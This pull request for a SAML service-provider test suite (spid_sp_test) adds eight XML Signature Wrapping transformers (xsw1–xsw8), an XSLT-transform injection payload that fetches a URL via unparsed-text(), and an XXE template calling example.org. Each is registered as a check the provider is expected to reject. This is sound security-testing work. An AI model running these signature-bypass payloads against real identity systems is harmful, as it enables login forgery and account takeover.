### PR TITLE
Added "X509Certificate" response configuration parameter and XSW/XSLT pentest

### DIFF
--- a/README.md
+++ b/README.md
@@ -154,7 +154,7 @@ spid_sp_test --metadata-url https://sp.testunical.it/pymetadata_signed.xml --aut
 Test Satosa-Saml2Spid using its authn plugin and a SP that supports idp hinting
 
 ````
-spid_sp_test --metadata-url https://localhost:10000/spidSaml2/metadata --authn-url "http://sp1.testunical.it:8000/saml2/login/?idp=https://localhost:10000/Saml2IDP/metadata&next=/saml2/echo_attributes&idphint=https%253A%252F%252Flocalhost%253A8080" -ap spid_sp_test.plugins.authn_request.SatosaSaml2Spid --extra -tr
+spid_sp_test --metadata-url https://localhost:10000/spidSaml2/metadata --authn-url "http://localhost:8000/saml2/login/?idp=https://localhost:10000/Saml2IDP/metadata&next=/saml2/echo_attributes&idphint=https%253A%252F%252Flocalhost%253A8080" -ap spid_sp_test.plugins.authn_request.SatosaSaml2Spid --extra -tr
 ````
 
 

--- a/src/spid_sp_test/authn_request.py
+++ b/src/spid_sp_test/authn_request.py
@@ -55,7 +55,7 @@ def build_authn_post_data(
             "RelayState": "/",
         }
     else:
-        raise SAMLRequestNotFound(f"{authn_request_str}")
+        raise SAMLRequestNotFound(f"{authn_request_str[:128]}")
     return data
 
 
@@ -136,7 +136,10 @@ def get_authn_request(
         elif "?" in authn_request_str and "&" in authn_request_str:
             binding = "redirect"
         else:
-            raise Exception(f"Can't detect authn request from f{authn_request_url}")
+            raise Exception(
+                f"Can't detect authn request from f{authn_request_url}:"
+                f"{authn_request_str[:128]}"
+            )
     else:
         req_dict = {"verify": verify_ssl, "allow_redirects": False}
         # trigger the authn request

--- a/src/spid_sp_test/constants.py
+++ b/src/spid_sp_test/constants.py
@@ -419,3 +419,29 @@ ISO3166_CODES = [
 ]
 
 XML_NAMESPACES = {"spid": "https://spid.gov.it/saml-extensions"}
+NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:assertion'
+# TEMPLATE = '{urn:oasis:names:tc:SAML:2.0:assertion}%s'
+# XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
+SAMLP_NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:protocol'
+XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
+XS_NAMESPACE = 'http://www.w3.org/2001/XMLSchema'
+MD_NAMESPACE = "urn:oasis:names:tc:SAML:2.0:metadata"
+MDUI_NAMESPACE = "urn:oasis:names:tc:SAML:metadata:ui"
+DS_NAMESPACE = 'http://www.w3.org/2000/09/xmldsig#'
+XENC_NAMESPACE = "http://www.w3.org/2001/04/xmlenc#"
+ALG_NAMESPACE = "urn:oasis:names:tc:SAML:metadata:algsupport"
+MDATTR_NAMESPACE = "urn:oasis:names:tc:SAML:metadata:attribute"
+IDPDISC = "urn:oasis:names:tc:SAML:profiles:SSO:idp-discovery-protocol"
+
+OASIS_DEFAULT_NS_PREFIXES = {'saml': NAMESPACE,
+                             'samlp': SAMLP_NAMESPACE,
+                             'ds': DS_NAMESPACE,
+                             'xsi': XSI_NAMESPACE,
+                             'xs': XS_NAMESPACE,
+                             'mdui': MDUI_NAMESPACE,
+                             'md': MD_NAMESPACE,
+                             'xenc': XENC_NAMESPACE,
+                             'alg': ALG_NAMESPACE,
+                             'mdattr': MDATTR_NAMESPACE,
+                             'idpdisc': IDPDISC
+}

--- a/src/spid_sp_test/responses/response_wraps.py
+++ b/src/spid_sp_test/responses/response_wraps.py
@@ -1,0 +1,203 @@
+from lxml import etree
+from spid_sp_test.utils import del_ns
+
+from .. constants import OASIS_DEFAULT_NS_PREFIXES
+from .. response import saml_rnd_id
+
+
+def xsw1(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    signature = etree.tostring(_sign).decode()
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    response = etree.tostring(_res).decode()
+    signature = signature.replace('</Signature>', f"{response}</Signature>")
+
+    sign_elem = etree.XML(signature)
+    _res.insert(1, sign_elem)
+
+    _as_sign = _res.xpath('Assertion')[0].xpath('Signature')[0]
+    _res.xpath('Assertion')[0].remove(_as_sign)
+    _res.attrib['ID'] = saml_rnd_id()
+
+    xml = etree.tostring(_res).decode()
+    return xml
+
+
+def xsw2(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    new_res = etree.XML(etree.tostring(_res).decode())
+    tree.insert(2, new_res)
+    tree.insert(3, _sign)
+
+    evil_assertion = _res.xpath('Assertion')[0]
+    evil_assertion.attrib['ID'] = saml_rnd_id()
+    _as_sign = evil_assertion.xpath('Signature')[0]
+    evil_assertion.remove(_as_sign)
+
+    tree.attrib['ID'] = saml_rnd_id()
+    xml = etree.tostring(tree).decode()
+
+    return xml
+
+
+def xsw3(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = new_ass.xpath('Signature')[0]
+    new_ass.remove(_ass_sign)
+    new_ass.attrib['ID'] = saml_rnd_id()
+    tree.insert(2, new_ass)
+
+    xml = etree.tostring(tree).decode()
+    return xml
+
+
+def xsw4(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+    _res.remove(_ass)
+
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = new_ass.xpath('Signature')[0]
+    new_ass.remove(_ass_sign)
+    new_ass.attrib['ID'] = saml_rnd_id()
+    new_ass.append(_ass)
+
+    _res.append(new_ass)
+    xml = etree.tostring(_res).decode()
+    return xml
+
+
+def xsw5(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+    tree.remove(_ass)
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = new_ass.xpath('Signature')[0]
+    new_ass.remove(_ass_sign)
+
+    _ass.attrib['ID'] = saml_rnd_id()
+    tree.insert(3, new_ass)
+    tree.insert(2, _ass)
+
+    xml = etree.tostring(tree).decode()
+    return xml
+
+
+def xsw6(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+    tree.remove(_ass)
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = new_ass.xpath('Signature')[0]
+    new_ass.remove(_ass_sign)
+
+    _ass.attrib['ID'] = saml_rnd_id()
+    _ass.xpath('Signature')[0].append(new_ass)
+    tree.insert(2, _ass)
+
+    xml = etree.tostring(tree).decode()
+    return xml
+
+
+def xsw7(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = new_ass.xpath('Signature')[0]
+    new_ass.remove(_ass_sign)
+
+    ext = etree.XML("<Extensions />")
+    ext.insert(0, new_ass)
+    tree.insert(1, ext)
+
+    xml = etree.tostring(tree).decode()
+    return xml
+
+
+def xsw8(xml, conf):
+    tree = etree.fromstring(xml)
+    del_ns(tree)
+
+    _sign = tree.xpath('Signature')[0]
+    _res = tree.xpath('/Response')[0]
+    _res.remove(_sign)
+
+    _ass = _res.xpath('Assertion')[0]
+    new_ass = etree.XML(etree.tostring(_ass).decode())
+    _ass_sign = _ass.xpath('Signature')[0]
+    new_ass.remove(new_ass.xpath('Signature')[0])
+
+    obj = etree.XML("<Object />")
+    obj.insert(0, new_ass)
+    _ass_sign.append(etree.XML(etree.tostring(obj).decode()))
+    xml = etree.tostring(tree).decode()
+    return xml
+
+
+def xslt(xml, conf):
+    tree = etree.fromstring(xml)
+    trans = tree.xpath(
+                "ds:Signature/ds:SignedInfo/ds:Reference/ds:Transforms",
+                namespaces=OASIS_DEFAULT_NS_PREFIXES
+    )
+
+    payload = """<ds:Transform xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+                  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                     <xsl:template match="doc">
+                        <xsl:variable name="file" select="'test'" />
+                        <xsl:variable name="escaped" select="encode-for-uri('$file')" />
+                        <xsl:variable name="attackURL" select="'http://localhost:19000/#!/auth'" />
+                        <xsl:variable name="exploitURL" select="concat($attackerURL,$escaped)" />
+                        <xsl:value-of select="unparsed-text($exploitURL)" />
+                     </xsl:template>
+                  </xsl:stylesheet>
+               </ds:Transform>"""
+    _p = etree.XML(payload)
+    trans[0].insert(0, _p)
+    xml = etree.tostring(tree).decode()
+    return xml

--- a/src/spid_sp_test/responses/settings.py
+++ b/src/spid_sp_test/responses/settings.py
@@ -78,6 +78,13 @@ SIGNATURE_TMPL = """
             </ds:Reference>
         </ds:SignedInfo>
         <ds:SignatureValue />
+
+        <ds:KeyInfo>
+            <ds:X509Data>
+                <ds:X509Certificate />
+            </ds:X509Data>
+        </ds:KeyInfo>
+
     </ds:Signature>
 """
 
@@ -127,6 +134,19 @@ RESPONSE_TESTS = {
         "status_codes": HTTP_STATUS_ERROR_CODES,
         "path": "base.xml",
         "response": {},
+        "sign_credentials": {
+            "certificate": f"{BASE_DIR}/certificates/test_public.cert",
+            "privateKey": f"{BASE_DIR}/certificates/test_private.key",
+        },
+    },
+    "5": {
+        "name": "05. Response - Firma non valida con presenza x509 alternativo",
+        "description": "Response firmata con certificato diverso da quello registrato su SP, con x509 presente nella Response. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
         "sign_credentials": {
             "certificate": f"{BASE_DIR}/certificates/test_public.cert",
             "privateKey": f"{BASE_DIR}/certificates/test_private.key",

--- a/src/spid_sp_test/responses/settings.py
+++ b/src/spid_sp_test/responses/settings.py
@@ -152,6 +152,100 @@ RESPONSE_TESTS = {
             "privateKey": f"{BASE_DIR}/certificates/test_private.key",
         },
     },
+    "xsw1": {
+        "name": "xsw1. Wrapping attack",
+        "description": "XSW1 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw1"]
+    },
+    "xsw2": {
+        "name": "xsw2. Wrapping attack",
+        "description": "XSW2 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw2"]
+    },
+    "xsw3": {
+        "name": "xsw3. Wrapping attack",
+        "description": "XSW3 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw3"]
+    },
+    "xsw4": {
+        "name": "xsw4. Wrapping attack",
+        "description": "XSW4 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw4"]
+    },
+    "xsw5": {
+        "name": "xsw5. Wrapping attack",
+        "description": "XSW5 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw5"]
+    },
+    "xsw6": {
+        "name": "xsw6. Wrapping attack",
+        "description": "XSW6 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw6"]
+    },
+    "xsw7": {
+        "name": "xsw7. Wrapping attack",
+        "description": "XSW7 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw7"]
+    },
+    "xsw8": {
+        "name": "xsw8. Wrapping attack",
+        "description": "XSW8 Wrapping attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response": {
+            "X509Certificate": f"{BASE_DIR}/certificates/test_public.cert",
+        },
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xsw8"]
+    },
+    # "xxe": {
+        # "name": "XXE. attack",
+        # "description": "XXE attack. Risultato atteso: KO",
+        # "status_codes": HTTP_STATUS_ERROR_CODES,
+        # "path": "xxe.xml",
+        # "response": {},
+    # },
+    "xslt": {
+        "name": "XSLT. attack",
+        "description": "XSLT attack. Risultato atteso: KO",
+        "status_codes": HTTP_STATUS_ERROR_CODES,
+        "path": "base.xml",
+        "response_wrappers": ["spid_sp_test.responses.response_wraps.xslt"]
+    },
     "8": {
         "name": "08. Response - ID non specificato",
         "description": "Attributo ID non specificato. Risultato atteso: KO",

--- a/src/spid_sp_test/responses/templates/xxe.xml
+++ b/src/spid_sp_test/responses/templates/xxe.xml
@@ -1,0 +1,4 @@
+{% extends "base.xml" %}
+{% block pre %}<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://example.org/#!/auth"> %xxe; ]>
+
+{% endblock pre %}


### PR DESCRIPTION
feat: added "X509Certificate" configuration parameter to have x509 exposed in the Response
feat: added response check #5 to exploit this brand new feature

feat: XSW1 wrapping attack response check
feat: XSW2 wrapping attack response check
feat: XSW3 wrapping attack response check
feat: XSW4 wrapping attack response check
feat: XSW5 wrapping attack response check
feat: XSW6 wrapping attack response check
feat: XSW7 wrapping attack response check
feat: XSW8 wrapping attack response check
feat: XSLT attack response check
